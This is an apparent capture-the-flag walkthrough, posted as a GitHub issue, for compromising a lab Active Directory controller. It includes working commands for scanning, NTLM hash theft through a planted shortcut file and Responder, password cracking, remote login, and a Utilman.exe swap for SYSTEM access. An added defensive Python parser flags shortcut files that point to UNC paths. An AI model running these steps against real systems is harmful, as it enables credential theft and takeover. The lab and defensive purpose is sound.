Open WDavid404 opened 2 months ago
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-10 14:41:57Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| DNS_Domain_Name: vault.offsec
| DNS_Computer_Name: DC.vault.offsec
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49703/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49804/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
--> no info
rpcclient -U '' -N 192.168.208.172 --> no info
crackmapexec smb 192.168.208.172 --shares
--> no info
smbmap -u null -p "" -H 192.168.208.172 -P 445 -r 2>&1
-->
smbclient //192.168.208.172/DocumentsShare
-->
No files exist, but we can upload files.
ldapsearch -H ldap://192.168.208.172 -x -s base namingcontexts
-->
namingcontexts: DC=vault,DC=offsec
namingcontexts: CN=Configuration,DC=vault,DC=offsec
namingcontexts: CN=Schema,CN=Configuration,DC=vault,DC=offsec
namingcontexts: DC=DomainDnsZones,DC=vault,DC=offsec
namingcontexts: DC=ForestDnsZones,DC=vault,DC=offsec
ldapsearch -H ldap://192.168.208.172 -x -b"DC=vault,DC=offsec" --> no info
GetNPUsers.py vault.offsec/ -dc-ip 192.168.208.172 --> no info
ntlm_theft
A tool for generating multiple types of NTLMv2 hash theft files.
python3 ntlm_theft.py -g lnk -s 192.168.45.205 -f test
-->
Created: test/test.lnk (BROWSE TO FOLDER)
Generation Complete.
sudo responder -I tun0
Put test.lnk on the SMB share (DocumentsShare).
Then we get the NTLMv2 hash:
anirudh::VAULT:f2ec...
Crack the hash with john --> anirudh: SecureHM
evil-winrm -i 192.168.208.172 -u anirudh -p SecureHM
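Defender's counterpart to the LNK drop above, added here and not part of the original notes or of ntlm_theft: a parser for the Shell Link StringData section that flags shortcuts whose icon, target or working directory is a UNC path, which is what makes a file like test.lnk on a writable share such as DocumentsShare trigger an outbound NTLM authentication when it is merely displayed. The fixture LNK builder and the 192.0.2.10 address are constructed for the test.

```python
import struct

# LinkFlags bits from the MS-SHLLINK ShellLinkHeader (offset 0x14)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def lnk_string_data(data: bytes) -> dict:
    """Parse the StringData section of a Shell Link (.lnk) file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = 0x4C  # end of the fixed-size ShellLinkHeader
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]  # IDListSize + items
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]      # LinkInfoSize
    fields = {}
    for flag, name in STRING_FIELDS:  # StringData entries appear in this order
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252")
            off += count
    return fields


def unc_references(data: bytes) -> list:
    """Fields starting with two backslashes, i.e. paths Explorer resolves
    over SMB just by rendering the shortcut; flag these on shared folders."""
    return [(k, v) for k, v in lnk_string_data(data).items() if v.startswith("\\\\")]


def make_test_lnk(icon: str) -> bytes:
    """Constructed fixture: a minimal LNK carrying only an IconLocation string."""
    clsid = bytes.fromhex("0114020000000000c000000000000046")  # Shell Link CLSID
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, clsid,
                         HAS_ICON_LOCATION | IS_UNICODE, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + struct.pack("<H", len(icon)) + icon.encode("utf-16-le")
```

Run `unc_references()` over every `*.lnk` found on a share; a hit pointing at a host that is not one of your file servers is worth an incident ticket, and a Responder-style listener is exactly what it would be talking to.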
whoami /priv
--> We can see "SeRestorePrivilege" is enabled. =====> We can use the same way as the "Heist" box (https://github.com/WDavid404/PG-Box/issues/57#issuecomment-2277967937)
get-childitem -path C:\Windows\System32\ -include utilman.exe -file -recurse -erroraction silentlycontinue
--> utilman.exe is located in "C:\Windows\System32"
cd C:\Windows\System32
mv Utilman.exe Utilman-bk.exe
mv cmd.exe Utilman.exe
[Kali] rdesktop $IP
Keypoints: